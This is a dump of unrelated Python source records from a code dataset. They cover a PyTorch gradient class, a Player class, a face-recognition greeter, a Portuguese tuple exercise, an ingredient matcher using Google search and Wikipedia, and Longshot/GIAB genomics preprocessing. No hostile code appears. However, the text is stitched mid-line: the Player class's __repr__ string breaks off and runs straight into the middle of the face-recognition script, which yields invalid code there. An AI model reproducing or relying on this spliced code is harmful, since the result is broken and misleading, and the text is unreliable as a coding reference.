sign * -1.0 * prev_w_H[idx + 1].data))\n\n if id_H < net_H.num_blocks - 1:\n block_h2 = self.blocks[id_H * 2 + 1]\n block_H2 = net_H.blocks[id_H + 1]\n\n block_h2.linear.weight.grad.add_(0.5 * torch.add(sign * block_H.linear.weight.data, sign * -1 * prev_w_H[idx].data))\n block_h2.linear.weight.grad.add_(0.5 * torch.add(sign * block_H2.linear.weight.data, sign * -1 * prev_w_H[idx + 2].data))\n\n block_h2.linear.bias.grad.add_(0.5 * torch.add(sign * block_H.linear.bias.data, sign * -1 * prev_w_H[idx + 1].data))\n block_h2.linear.bias.grad.add_(0.5 * torch.add(sign * block_H2.linear.bias.data, sign * -1 * prev_w_H[idx + 3].data))\n\n self.linear_out.weight.grad.copy_(torch.add(sign * net_H.linear_out.weight.data, sign * -1 * prev_w_H[last_idx-1].data))\n self.linear_out.bias.grad.copy_(torch.add(sign * net_H.linear_out.bias.data, sign * -1 * prev_w_H[last_idx].data))\n\n def subtract_v_from_grad_f_H(self, v):\n sign = -1.0\n last_idx = len(v) -1\n self.linear_in.weight.grad.add_(sign * v[0])\n self.linear_in.bias.grad.add_(sign * v[1])\n # correct indices !\n for id_H, block_H in enumerate(self.blocks):\n block_H.linear.weight.grad.add_(sign * v[2 * (id_H + 1)])\n block_H.linear.bias.grad.add_(sign * v[2 * (id_H + 1) + 1])\n\n self.linear_out.weight.grad.add_(sign * v[last_idx-1])\n self.linear_out.bias.grad.add_(sign * v[last_idx])\n\n\n def save_weights_to_tensor(self):\n t = []\n t.append(copy.deepcopy(self.linear_in.weight.data))\n t.append(copy.deepcopy(self.linear_in.bias.data))\n\n for block in self.blocks:\n t.append(copy.deepcopy(block.linear.weight.data))\n t.append(copy.deepcopy(block.linear.bias.data))\n\n t.append(copy.deepcopy(self.linear_out.weight.data))\n t.append(copy.deepcopy(self.linear_out.bias.data))\n\n return t\n\n def _gather_flat_grad(self):\n views = []\n for p in self.parameters():\n if p.grad is None:\n view = p.data.new(p.data.numel()).zero_()\n elif 
p.grad.data.is_sparse:\n view = p.grad.data.to_dense().view(-1)\n else:\n view = p.grad.data.view(-1)\n views.append(view)\n return torch.cat(views, 0)\n\n def compute_m(self, level, v):\n m = 0\n with torch.no_grad():\n for param in self.parameters():\n m += torch.sum(param.data * param.grad)\n return m\n\n def save_grad_to_tensor(self):\n t = []\n t.append(copy.deepcopy(self.linear_in.weight.grad))\n t.append(copy.deepcopy(self.linear_in.bias.grad))\n\n for block in self.blocks:\n t.append(copy.deepcopy(block.linear.weight.grad))\n t.append(copy.deepcopy(block.linear.bias.grad))\n\n t.append(copy.deepcopy(self.linear_out.weight.grad))\n t.append(copy.deepcopy(self.linear_out.bias.grad))\n\n return t\n\n def copy_tensor_to_weights(self, t):\n last_idx = len(t) -1\n self.linear_in.weight.data = copy.deepcopy(t[0])\n self.linear_in.bias.data = copy.deepcopy(t[1])\n\n for id, block in enumerate(self.blocks):\n block.linear.weight.data = copy.deepcopy(t[2 * (id + 1)])\n block.linear.bias.data = copy.deepcopy(t[2 * (id + 1) + 1])\n\n self.linear_out.weight.data = copy.deepcopy(t[last_idx-1])\n self.linear_out.bias.data = copy.deepcopy(t[last_idx])","sub_path":"ml_mnist1d_flat.py","file_name":"ml_mnist1d_flat.py","file_ext":"py","file_size_in_byte":8211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"524759654","text":"class Player(object):\n def __init__(self, num, score, ping, guid, name, lastmsg, address, qport, rate):\n self.num = num\n self.score = score\n self.ping = ping\n self.guid = guid\n self.name = name\n self.lastmsg = lastmsg\n self.address = address\n self.qport = qport\n self.rate = rate\n\n def __repr__(self):\n return \" 10):\n\t\t\t\t\tcurrentname = name\n\t\t\t\t\tprint(currentname)\n\t\t\t\t\tprint('ok person? ',currentname == ok_person) \n\t\t\t\t\t\n\t\t\t\t\t# Say hi!\n\t\t\t\t\tsentences = sentences_ok if currentname == ok_person else sentences_no\n\t\t\t\t\tcurrent_sentence = random.choice(sentences)\n\t\t\t\t\tcurrent_sentence = current_sentence.replace(\"\", currentname)\n\t\t\t\t\t\n\t\t\t\t\tif args.voice == 'google':\n\t\t\t\t\t\tos.system(f'./speech.sh {current_sentence} ')\n\t\t\t\t\telif args.voice == 'espeak':\n\t\t\t\t\t\tos.system(f'espeak-ng -ven+f4 \"{current_sentence}\" ')\n\t\t\t\t\t\n\t\t\t\t\tframes_since_detect = 0\n\t\t\t\t\t\n\t\t\t\n\t\t\t# update the list of names\n\t\t\tnames.append(name)\n\n\t\t# loop over the recognized faces\n\t\tfor ((top, right, bottom, left), name) in zip(boxes, names):\n\t\t\t# draw the predicted face name on the image - color is in BGR\n\t\t\tcv2.rectangle(frame, (left, top), (right, bottom),\n\t\t\t\t(0, 255, 225), 2)\n\t\t\ty = top - 15 if top - 15 > 15 else top + 15\n\t\t\tcv2.putText(frame, name, (left, y), cv2.FONT_HERSHEY_SIMPLEX,\n\t\t\t\t.8, (0, 255, 255), 2)\n\n\t\t# display the image to our screen\n\t\tcv2.imshow(\"Facial Recognition is Running\", frame)\n\t\tkey = cv2.waitKey(1) & 0xFF\n\n\t\t# quit when 'q' key is pressed\n\t\tif key == ord(\"q\"):\n\t\t\tbreak\n\n\t\t# update the FPS counter\n\t\tfps.update()\n\t\tframes_since_detect += 1\n\n\t# stop the timer and display FPS information\n\tfps.stop()\n\tprint(\"[INFO] elasped time: {:.2f}\".format(fps.elapsed()))\n\tprint(\"[INFO] approx. 
FPS: {:.2f}\".format(fps.fps()))\n\n\t# do a bit of cleanup\n\tcv2.destroyAllWindows()\n\tvs.stop()\n\nif __name__ == \"__main__\":\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('--encodings', type=str, default='./encodings.pickle',\n\t\t\t\t\t\thelp='path to encodings of images')\n\tparser.add_argument('--haar-encodings', type=str, default='./haarcascade_frontalface_default.xml',\n\t\t\t\t\t\thelp='path to pre-trained haar encodings')\n\tparser.add_argument('--sentences-ok', type=str, default='./sentences_ok.txt', \n\t\t\t\t\t\thelp='Text file containing sentences when passage is okay')\n\tparser.add_argument('--sentences-stop', type=str, default='./sentences_stop.txt', \n\t\t\t\t\t\thelp='Text file containing sentences when passage is denied')\n\tparser.add_argument('--name-exception', type=str, default='', \n\t\t\t\t\t\thelp='names of person for which passage is okay')\n\tparser.add_argument('--voice', type=str, default='google', choices=['google', 'espeak'],\n\t\t\t\t\t\thelp='choose between \"google\" (requires internet access) and \"espeak\"')\n\targs = parser.parse_args()\n\tmain(args)\n","sub_path":"facial_req.py","file_name":"facial_req.py","file_ext":"py","file_size_in_byte":5863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"220097968","text":"num = (int(input('Valor 1: ')),\n int(input('Valor 2: ')),\n int(input('Valor 3: ')),\n int(input('Valor 4: ')))\nprint('- ' * 15)\nif 9 in num:\n print(f'O número 9 aparece {num.count(9)} vez(es)')\nelse:\n print('O número 9 não foi digitado')\nif 3 in num:\n print(f'O número 3 foi digitado na {num.index(3) + 1}ª posição pela primeira vez')\nelse:\n print('O número 3 não foi digitado')\npar = False\ncont = 0\nfor n in num:\n if n % 2 == 0:\n cont += 1\nif cont > 0:\n par = True\nif par:\n print('Os número pares digitados foram: ', end='')\n for n in num:\n if n % 2 == 0:\n print(n, end=' ')\n print()\nelse:\n print('Não foi digitado nenhum número par')\n\nprint('- ' * 15)\n","sub_path":"Revisao_Estruturas_Dados/rev_075.py","file_name":"rev_075.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"619016123","text":"# Import some packages\n\nimport _pickle as cPickle\nimport string\nimport pandas as pd\nimport numpy as np\nimport scipy\nfrom scipy import spatial\n\nfrom bs4 import BeautifulSoup\nimport urllib.parse\nimport urllib.request\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nfrom nltk.stem import WordNetLemmatizer\n\nnltk.download('stopwords')\nnltk.download('punkt')\nnltk.download('wordnet')\nnltk.download('averaged_perceptron_tagger')\n\nfrom googleapiclient.discovery import build\nimport os.path\n\nimport wikipedia\n\n# Load some data, define some values\n\nvectorizer = cPickle.load(open('../greenr/vectorizer.pk', 'rb'))\ndf_wiki_similarities = cPickle.load(open('../greenr/df_wiki_similarities.pk', 'rb'))\ndf_recorded_similarities = cPickle.load(open('../greenr/df_recorded_similarities.pk', 'rb'))\n\napi_key = cPickle.load(open('../greenr/api_key.pk', 'rb'))\ncse_id = \"dd94ab4664d1ce589\"\n\ncatsums = df_wiki_similarities['summaries'][:45]\ncats = list(df_wiki_similarities[df_wiki_similarities['ingr/cat'] == 'cat']\n ['ingredient'])\ncatvectors = vectorizer.transform(catsums)\n\nsimilarity_cutoff = 0.1\nno_match = 'No match found'\n\n# Define some utility 
functions\n\ndef is_ingredient_in_database(ingredient):\n found = ingredient in list(df_recorded_similarities.ingredient)\n return found\n\ndef get_database_match(ingredient):\n\n match = df_recorded_similarities.loc[df_recorded_similarities['ingredient'] == ingredient, 'category'].iloc[0]\n\n return match\n\ndef is_ingredient_in_wikidata(ingredient):\n found = ingredient in list(df_wiki_similarities.ingredient)\n return found\n\ndef get_wiki_match(ingredient):\n\n i_ix = list(df_wiki_similarities.ingredient).index(ingredient)\n\n chosen_summ = df_wiki_similarities.summaries[i_ix]\n\n sims = df_wiki_similarities.iloc[i_ix, 4:]\n\n c_ix = pd.to_numeric(sims).argmax()\n\n ingredient = df_wiki_similarities['ingredient'][i_ix]\n category = df_wiki_similarities['ingredient'][c_ix]\n\n return category, max(sims)\n\ndef google_query(query, api_key, cse_id, **kwargs):\n\n query_service = build(\"customsearch\", \"v1\", developerKey=api_key, cache_discovery = False)\n query_results = query_service.cse().list(q=query, cx=cse_id,\n **kwargs).execute()\n\n return query_results['items']\n\n\ndef get_google_cse_result(ingredient):\n\n query = f'{ingredient} food'\n\n my_results = google_query(query, api_key, cse_id, num=1)[0]\n\n url = my_results['link']\n url_base = os.path.basename(my_results['link'])\n\n return ingredient, url, url_base\n\ndef get_pageid_from_base(base):\n\n info_url = f'https://en.wikipedia.org/w/index.php?title={base}&action=info'\n\n req = urllib.request.Request(info_url)\n req.add_header('Cookie', 'euConsent=true')\n html_content = urllib.request.urlopen(req).read()\n soup = BeautifulSoup(html_content, 'html.parser')\n\n infosection = soup.find(\"script\")\n pageid = infosection.decode().partition('wgArticleId\":')[2].partition(\n ',')[0]\n\n return pageid\n\ndef get_summary_from_id(pageid):\n\n pagesummary = wikipedia.page(pageid=pageid).summary\n\n return pagesummary\n\ndef pre_process_summary(summary):\n\n # Remove punctuation\n for punctuation in string.punctuation:\n summary = str(summary).replace(punctuation, '')\n\n # Lower text\n summary = summary.lower()\n\n # Stopwords\n stop_words = set(stopwords.words('english'))\n summary_tokenized = word_tokenize(summary)\n text = [w for w in summary_tokenized if not w in stop_words]\n summary = ' '.join(text)\n\n # Remove digits\n summary = ''.join([word for word in summary if not word.isdigit()])\n\n # Lemmatize\n lemmatizer = WordNetLemmatizer()\n\n summary = ' '.join([lemmatizer.lemmatize(word) for word in summary.split(' ')])\n\n # Keep only nouns\n tokens = summary.split()\n tags = nltk.pos_tag(tokens)\n\n summary = [\n word for word, pos in tags\n if (pos == 'NN' or pos == 'NNP' or pos == 'NNS' or pos == 'NNPS')\n ]\n\n summary = ' '.join(summary)\n\n return summary\n\ndef get_match_and_score(summary_vector):\n\n scoreseries = []\n\n for j, catsum in enumerate(catsums):\n\n cosine_sum = 1 - spatial.distance.cosine(summary_vector.toarray(),\n catvectors[j, :].toarray())\n\n scoreseries.append(cosine_sum)\n\n matchscore = max(scoreseries)\n match = cats[scoreseries.index(matchscore)]\n\n return match, matchscore\n\ndef get_google_match(ingredient):\n\n try:\n ingredient, url, url_base = get_google_cse_result(ingredient)\n except:\n return 'nomatch', 0\n\n pageid = get_pageid_from_base(url_base)\n\n pagesummary = get_summary_from_id(pageid)\n\n processed_summary = pre_process_summary(pagesummary)\n\n summary_vector = vectorizer.transform([processed_summary])\n\n match, matchscore = get_match_and_score(summary_vector)\n\n return 
match, matchscore\n\ndef update_database(ingredient, match):\n\n global df_recorded_similarities\n\n df_tmp = pd.DataFrame([[ingredient, match]], columns = ['ingredient','category'])\n\n df_recorded_similarities = df_recorded_similarities.append(df_tmp, ignore_index=True)\n\n cPickle.dump(df_recorded_similarities, open(\"../greenr/df_recorded_similarities.pk\", \"wb\"))\n\n return None\n\n# Define the matching function\n\ndef get_categories(df_parser_output, try_google=False):\n\n matched_categories = []\n\n list_of_ingredients = list(df_parser_output['name'])\n\n for ingredient in list_of_ingredients:\n\n if is_ingredient_in_database(ingredient):\n\n match = get_database_match(ingredient)\n\n else:\n\n if is_ingredient_in_wikidata(ingredient):\n\n wikimatch, score = get_wiki_match(ingredient)\n\n if score > similarity_cutoff:\n match = wikimatch\n\n elif try_google:\n googlematch, score = get_google_match(ingredient)\n if score > similarity_cutoff:\n match = googlematch\n else:\n match = no_match\n\n else:\n match = no_match\n\n elif try_google:\n\n googlematch, score = get_google_match(ingredient)\n\n if score > similarity_cutoff:\n match = googlematch\n\n else:\n match = no_match\n\n else:\n match = no_match\n\n update_database(ingredient, match)\n\n matched_categories.append(match)\n\n for i,cat in enumerate(matched_categories):\n if cat == 'Onions & leeks':\n matched_categories[i] = 'Onions & Leeks'\n\n if cat == 'Berries & Grapes2':\n matched_categories[i] = 'Berries & Grapes'\n\n return matched_categories\n","sub_path":"greenr/matching.py","file_name":"matching.py","file_ext":"py","file_size_in_byte":6898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"69729522","text":"import numpy as np\nimport pandas as pd\nimport allel\n\n\ndef read_fragments(fragments_path):\n\t''' \n\tReads fragments file and returns read allele and quality data as \n\t\tnumpy matrices. 
Sites in matrices where there is no data are np.nan\n\n\tArgs:\tpath to a fragments.txt file\n\n\tReturns 3 numpy arrays:\n\t\tarray of fragment_ids corresponding to rows\n\t\tmatrix of allele values {0,1,np.nan} where rows correspond to samples \n\t\t\tand cols to sites\n\t\tmatrix of Phred quality scores or np.nan where no read\n\t'''\n\tfrag_ids, row_col_pairs, allele_vals, qual_scores = read_fragments_arrays(\n\t\tfragments_path\n\t)\n\n\tallele_mat = np.full(row_col_pairs.max(axis=0)+1, np.nan)\n\tallele_mat[row_col_pairs[:,0], row_col_pairs[:,1]] = allele_vals\n\n\tqual_mat = np.full(row_col_pairs.max(axis=0)+1, np.nan)\n\tqual_mat[row_col_pairs[:,0], row_col_pairs[:,1]] = qual_scores\n\n\treturn frag_ids, allele_mat, qual_mat\n\n\ndef read_fragments_arrays(fragments_path):\n\t''' \n\tReads fragments file and returns data as numpy arrays of corresponding\n\t\tindices and data\n\n\tArgs:\tpath to a fragments.txt file\n\n\tReturns 4 numpy arrays:\n\t\tfragment_ids corresponding to rows\n\t\trow col indices for the data in allele_vals and qual_scores\n\t\tallele values {0,1} at row,col locs\n\t\tPhred quality scores at row,col locs\n\t'''\n\twith open(fragments_path) as f:\n\n\t\tfrag_ids = []\t\t# fragment ids from col 2\n\t\trow_col_pairs = []\t# row,col indices coresponding to allele values\n\t\tallele_vals = []\t# \tand quality scores as matrices\n\t\tqual_scores = []\n\n\t\trow_ind = 0\n\n\t\tfor line in f:\n\t\t\tline_data = line.strip().split()\n\t\t\tfrag_ids.append(line_data[1])\n\n\t\t\t# get sample's row,col pairs and allele vals\n\t\t\tblock_data = line_data[2:-1]\n\n\t\t\tfor i in range(0, len(block_data), 2):\n\t\t\t\tblock_start_ind = int(block_data[i])\n\n\t\t\t\tfor start_offset in range(len(block_data[i + 1])):\n\t\t\t\t\trow_col_pairs.append(\n\t\t\t\t\t\t(row_ind, block_start_ind + start_offset)\n\t\t\t\t\t)\n\t\t\t\t\tallele_vals.append(block_data[i + 1][start_offset])\n\n\t\t\t# add quality scores\n\t\t\tqual_str = line_data[-1]\n\t\t\tfor char in qual_str:\n\t\t\t\tqual_scores.append(ord(char) - 33)\n\n\t\t\trow_ind += 1\n\n\t\t# set indices to start at 0\n\t\trow_col_pairs = np.array(row_col_pairs)\n\t\trow_col_pairs -= row_col_pairs.min(axis=0, keepdims=True)\n\n\t\treturn (\n\t\t\tnp.array(frag_ids),\n\t\t\trow_col_pairs,\n\t\t\tnp.array(allele_vals).astype(int),\n\t\t\tnp.array(qual_scores)\n\t\t)\n\n\ndef get_bed_mask(bed_path, ls_callset_pos, chrom='chr20'):\n\t''' \n\tReads areas in GIAB from .bed and uses to mask longshot callset positions\n\t'''\n\twith open(bed_path) as f:\n\t\tstarts = []\n\t\tends = []\n\n\t\tfor line in f:\n\t\t\tline_data = line.strip().split()\n\n\t\t\tif line_data[0] == chrom:\n\t\t\t\tstarts.append(line_data[1])\n\t\t\t\tends.append(line_data[2])\n\n\tstarts = np.array(starts).astype(int)\n\tends = np.array(ends).astype(int)\n\n\tin_bed_range = []\n\n\tfor ls_pos in ls_callset_pos:\n\t\tin_bed_range.append(\n\t\t\tnp.any((starts <= ls_pos) & (ends > ls_pos))\n\t\t)\n\n\treturn np.array(in_bed_range)\n\n\ndef get_true_variants(longshot_vcf_path, ground_truth_vcf_path, giab_bed_path,\n\t\t\t\t\t\treturn_vcfs=False):\n\t''' \n\tFinds true/false variants in fragments file using GIAB ground truth vcf\n\n\tArgs: \n\t\tlongshot_vcf_path: path to \"2.0.realigned_genotypes.vcf\" for longshot run\n\t\t\tthat produced the fragments.txt file being used\n\t\tground_truth_vcf_path: path to GIAB ground truth vcf\n\t\tgiab_bed_path: giab ground truth corresponding .bed\n\t\treturn_vcfs: if the longshot and ground_truth vcfs should be 
returned.\n\t\t\tWill be returned as callsets\n\t\n\tReturns:\n\t\tarray length of number of cols of fragments matrix where each is\n\t\t\tlabeled True/False wrt being real variants\n\t\tsite_mask to use to filter columns of fragments matrix\n\t\tif return_vcfs, returns (true_variants, longshot_vcf, ground_truth_vcf)\n\t'''\n\t# load vcf from longshot run\n\tls_callset = allel.read_vcf(longshot_vcf_path)\n\n\t# load ground truth vcf\n\tcallset = allel.read_vcf(ground_truth_vcf_path)\n\n\t# find true variants\n\tchr20_mask = callset['variants/CHROM'] == ls_callset['variants/CHROM'][0]\n\tcallset = mask_callset(callset, chr20_mask)\n\n\tin_truth = np.in1d(ls_callset['variants/POS'], callset['variants/POS'])\n\n\t# mask out regions not in .bed\n\tin_bed_mask = get_bed_mask(giab_bed_path, ls_callset['variants/POS'])\n\n\t# find where longshot predicts heterozygous\n\tls_01 = np.all(np.equal(ls_callset['calldata/GT'], [0,1]), axis=2).T[0]\n\tls_10 = np.all(np.equal(ls_callset['calldata/GT'], [1,0]), axis=2).T[0]\n\tls_hetero = ls_01 | ls_10\n\n\tsite_mask = in_bed_mask & ls_hetero\n\n\tif return_vcfs:\n\t\treturn in_truth.astype(int)[site_mask], site_mask, ls_callset, callset\n\telse:\n\t\treturn in_truth.astype(int)[site_mask], site_mask\n\n\ndef mask_callset(callset, mask):\n\tfor key in list(callset):\n\t\tif key == 'samples':\n\t\t\tcontinue\n\t\tcallset[key] = callset[key][mask]\n\n\treturn callset\n\n\ndef matrix_sparsity_info(allele_mat, print_info=False):\n\t''' \n\tGet info about sparsity of allele/quality/incorrect read matrix by\n\trows and cols\n\t'''\n\n\tsample_reads = np.count_nonzero(~np.isnan(allele_mat), axis=1)\n\tsite_reads = np.count_nonzero(~np.isnan(allele_mat), axis=0)\n\n\tif print_info:\n\t\tnonzero_sites = np.count_nonzero(~np.isnan(allele_mat))\n\n\t\tprint(\"num elements not missing:\\t{}\".format(nonzero_sites))\n\t\tprint(\"percent matrix not missing:\\t{:.3f}\".format(\n\t\t\tnonzero_sites / allele_mat.size\n\t\t))\n\n\t\tprint(\"num fragments:\\t{}\".format(allele_mat.shape[0]))\n\t\tprint(\"num sites:\\t{}\".format(allele_mat.shape[1]))\n\n\t\tprint(\"\\nfragments:\")\n\t\tval = np.mean(sample_reads)\n\t\tprint(\"\\tmean reads:\\t{:.1f}\\t{:.3f}\".format(val, val / allele_mat.shape[1]))\n\t\tval = np.median(sample_reads)\n\t\tprint(\"\\tmedian reads:\\t{}\\t{:.3f}\".format(val, val / allele_mat.shape[1]))\n\t\tval = np.max(sample_reads)\n\t\tprint(\"\\tmax reads:\\t{}\\t{:.3f}\".format(val, val / allele_mat.shape[1]))\n\t\tval = np.min(sample_reads)\n\t\tprint(\"\\tmin reads:\\t{}\\t{:.3f}\".format(val, val / allele_mat.shape[1]))\n\t\t\n\t\tprint(\"\\nsites:\")\n\t\tval = np.mean(site_reads)\n\t\tprint(\"\\tmean reads:\\t{:.1f}\\t{:.3f}\".format(val, val / allele_mat.shape[0]))\n\t\tval = np.median(site_reads)\n\t\tprint(\"\\tmedian reads:\\t{}\\t{:.3f}\".format(val, val / allele_mat.shape[0]))\n\t\tval = np.max(site_reads)\n\t\tprint(\"\\tmax reads:\\t{}\\t{:.3f}\".format(val, val / allele_mat.shape[0]))\n\t\tval = np.min(site_reads)\n\t\tprint(\"\\tmin reads:\\t{}\\t{:.3f}\".format(val, val / allele_mat.shape[0]))\n\n\treturn sample_reads, site_reads\n\n\ndef save_preprocessed(path, fragments, qualities, variant_labels):\n\tnp.savez(\n\t\tpath, \n\t\tfragments=fragments,\n\t\tqualities=qualities,\n\t\tvariant_labels=variant_labels)\n\n\ndef load_preprocessed(path):\n\t''' Returns (fragments, qualities, variant_labels) from .npz '''\n\tdata = np.load(path)\n\treturn data['fragments'], data['qualities'], data['variant_labels']\n\n\ndef 
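_example_preprocessed_roundtrip(npz_path):\n\t''' \n\tIllustrative sketch only, not used by the rest of this module: shows the\n\t\tsave_preprocessed/load_preprocessed round trip on small dummy arrays.\n\tnpz_path is a hypothetical output location ending in .npz\n\t'''\n\tfragments = np.zeros((2, 3))\n\tqualities = np.full((2, 3), 30.0)\n\tvariant_labels = np.array([1, 0, 1])\n\tsave_preprocessed(npz_path, fragments, qualities, variant_labels)\n\treturn load_preprocessed(npz_path)\n\n\ndef 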
encode_genotype(gt):\n\t'''\n\tEncode genotype from giab vcf as int:\n\t\t0 if 0/0\n\t\t1 if 0/1\n\t\t2 if 1/1\n\t\t-1 if anything else\n\t'''\n\tif gt[0] == 0 and gt[1] == 0:\n\t\treturn 0\n\telif gt[0] == 1 and gt[1] == 1:\n\t\treturn 2\n\telif (gt[0] == 0 and gt[1] == 1) or (gt[0] == 1 and gt[1] == 0):\n\t\treturn 1\n\telse:\n\t\treturn -1\n\n\ndef load_data(fragments_path, longshot_vcf_path, ground_truth_vcf_path,\n\t\t\t\tgiab_bed_path, save_path=None, return_full_frag_mats=False):\n\t''' \n\tLoad data from fragments.txt & 2.0.realigned_genotypes.vcf files\n\tgenerated by Longshot and the GIAB ground truth vcf and bed files\n\n\tArgs:\n\t\tfragments_path: path to fragments.txt\n\t\tlongshot_vcf_path: path to 2.0.realigned_genotypes.vcf\n\t\tground_truth_vcf_path: path to something like \n\t\t\tHG002_GRCh38_1_22_v4.1_draft_benchmark.vcf\n\t\tgiab_bed_path: path to something like HG002_..._benchmark.bed\n\t\tsave_path: location to save a file in a directory that already \n\t\t\texists\n\t\treturn_full_frag_mats: if True, returns unmasked fragments and\n\t\t\tqualities matrices in addition to masked versions usually \n\t\t\treturned\n\n\tReturns:\n\t\t(site_data, fragments, qualities) or if return_full_frag_mats:\n\t\t(site_data, fragments, qualities, fragments_unmasked, \n\t\t\tqualities_unmasked)\n\n\t\tsite_data: DataFrame with info for all sites HMM predicts are\n\t\t\theterozygous\n\t\tfragments: fragments matrix as returned by read_fragments masked\n\t\t\tto sites HMM predicts are heterozygous\n\t\tqualities: qualities matrix as returned by read_fragments masked\n\t\t\tto sites HMM predicts are heterozygous\n\t\tfragments_unmasked: fragments matrix as returned by read_fragments\n\t\tqualities_unmasked: qualities matrix as returned by read_fragments\t\t\n\t'''\n\t# load vcf from longshot run\n\tls_callset = allel.read_vcf(longshot_vcf_path)\n\n\t# find where longshot hmm predicts heterozygous\n\tls_01 = np.all(np.equal(ls_callset['calldata/GT'], [0,1]), axis=2).T[0]\n\tls_10 = np.all(np.equal(ls_callset['calldata/GT'], [1,0]), axis=2).T[0]\n\tls_hetero = ls_01 | ls_10\n\thetero_site_inds = np.where(ls_hetero)[0]\n\n\tls_callset = mask_callset(ls_callset, ls_hetero)\n\n\t# binary if site in .bed region (and therefore there will be ground truth)\n\tin_bed_mask = get_bed_mask(giab_bed_path, ls_callset['variants/POS']).astype(int)\n\n\t# load ground truth vcf\n\tgiab_callset = allel.read_vcf(ground_truth_vcf_path)\n\n\t# mask GIAB vcf to correct chromesome and make DataFrame rep\n\tchr_mask = giab_callset['variants/CHROM'] == ls_callset['variants/CHROM'][0]\n\tgiab_callset = mask_callset(giab_callset, chr_mask)\n\n\tgiab_df = pd.DataFrame(\n\t\tnp.vstack((\n\t\t\tgiab_callset['variants/CHROM'],\n\t\t\tgiab_callset['variants/POS'],\n\t\t\tgiab_callset['variants/REF'],\n\t\t\t[','.join(giab_callset['variants/ALT'][i]) for i in range(\n\t\t\t\t\tgiab_callset['variants/ALT'].shape[0])],\n\t\t\t[encode_genotype(gt[0]) for gt in giab_callset['calldata/GT']] \n\t\t)).T,\n\t\tcolumns=['chrom', 'pos', 'ref', 'alt', 'genotype']\n\t)\n\n\tdf = pd.DataFrame(\n\t\tnp.array((\n\t\t\thetero_site_inds, \n\t\t\tin_bed_mask, \n\t\t\tls_callset['variants/CHROM'],\n\t\t\tls_callset['variants/POS'])).T,\n\t\tcolumns=['site_ind', 'in_bed', 'chrom', 'pos']\n\t)\n\n\tdf = pd.merge(df, giab_df, how='left', on=['chrom', 'pos'])\n\n\t# fill for genotype=0 sites in bed but not var sites\n\tdf.loc[df.in_bed == 1, 'genotype'] = df.loc[df.in_bed == 1]['genotype'].fillna(0)\n\n\t# save\n\tif 
save_path:\n\t\tdf.to_csv(save_path, na_rep='', sep='\\t', index=False)\n\n\t# load read fragments and their qualities\n\t_, fragments, qualities = read_fragments(fragments_path)\n\n\tif return_full_frag_mats:\n\t\treturn (df, fragments[:, df.site_ind.astype(int)], \n\t\t\t\tqualities[:, df.site_ind.astype(int)], fragments, qualities)\n\telse:\n\t\treturn (df, fragments[:, df.site_ind.astype(int)], \n\t\t\t\tqualities[:, df.site_ind.astype(int)])\n\n\ndef load_full_data(fragments_path, longshot_vcf_path, ground_truth_vcf_path,\n\t\t\t\t\tgiab_bed_path, save_path=None):\n\t''' \n\tLoad data from fragments.txt & 2.0.realigned_genotypes.vcf files\n\tgenerated by Longshot and the GIAB ground truth vcf and bed files.\n\tDoes not mask data to Longshot predicted heterozygous sites as \n\tload_data does.\n\n\tArgs:\n\t\tfragments_path: path to fragments.txt\n\t\tlongshot_vcf_path: path to 2.0.realigned_genotypes.vcf\n\t\tground_truth_vcf_path: path to something like \n\t\t\tHG002_GRCh38_1_22_v4.1_draft_benchmark.vcf\n\t\tgiab_bed_path: path to something like HG002_..._benchmark.bed\n\t\tsave_path: location to save a file in a directory that already \n\t\t\texists\n\n\tReturns:\n\t\tsite_data, fragments, qualities\n\n\t\tsite_data: DataFrame with info for all sites in fragments matrix\n\t\tfragments: fragments matrix as returned by read_fragments\n\t\tqualities: qualities matrix as returned by read_fragments\t\n\t'''\n\t# load vcf from longshot run\n\tls_callset = allel.read_vcf(longshot_vcf_path)\n\n\t# longshot hmm predictions\n\tls_01 = np.all(np.equal(ls_callset['calldata/GT'], [0,1]), axis=2).T[0]\n\tls_10 = np.all(np.equal(ls_callset['calldata/GT'], [1,0]), axis=2).T[0]\n\tls_hetero = ls_01 | ls_10\n\tls_11 = np.all(np.equal(ls_callset['calldata/GT'], [1,1]), axis=2).T[0]\n\n\tls_gt = np.zeros(ls_callset['variants/POS'].shape[0]).astype(int)\n\tls_gt[ls_hetero] = 1\n\tls_gt[ls_11] = 2\n\n\t# binary if site in .bed region (and therefore there will be ground truth)\n\tin_bed_mask = get_bed_mask(giab_bed_path, ls_callset['variants/POS']).astype(int)\n\n\t# load ground truth vcf\n\tgiab_callset = allel.read_vcf(ground_truth_vcf_path)\n\n\t# mask GIAB vcf to correct chromesome and make DataFrame rep\n\tchr_mask = giab_callset['variants/CHROM'] == ls_callset['variants/CHROM'][0]\n\tgiab_callset = mask_callset(giab_callset, chr_mask)\n\n\tgiab_df = pd.DataFrame(\n\t\tnp.vstack((\n\t\t\tgiab_callset['variants/CHROM'],\n\t\t\tgiab_callset['variants/POS'],\n\t\t\tgiab_callset['variants/REF'],\n\t\t\t[','.join(giab_callset['variants/ALT'][i]) for i in range(\n\t\t\t\t\tgiab_callset['variants/ALT'].shape[0])],\n\t\t\t[encode_genotype(gt[0]) for gt in giab_callset['calldata/GT']]\n\t\t)).T,\n\t\tcolumns=['chrom', 'pos', 'ref', 'alt', 'genotype']\n\t)\n\n\tdf = pd.DataFrame(\n\t\tnp.array((\n\t\t\trange(ls_callset['variants/POS'].shape[0]), \n\t\t\tin_bed_mask, \n\t\t\tls_callset['variants/CHROM'],\n\t\t\tls_callset['variants/POS'],\n\t\t\tls_gt\n\t\t)).T,\n\t\tcolumns=[\n\t\t\t'site_ind', 'in_bed', 'chrom', 'pos',\n\t\t\t'ls_hmm_pred_genotype'\n\t\t]\n\t)\n\n\tdf = pd.merge(df, giab_df, how='left', on=['chrom', 'pos'])\n\n\t# fill for genotype=0 sites in bed but not var sites\n\tdf.loc[df.in_bed == 1, 'genotype'] = df.loc[df.in_bed == 1]['genotype'].fillna(0)\n\n\t# save\n\tif save_path:\n\t\tdf.to_csv(save_path, na_rep='', 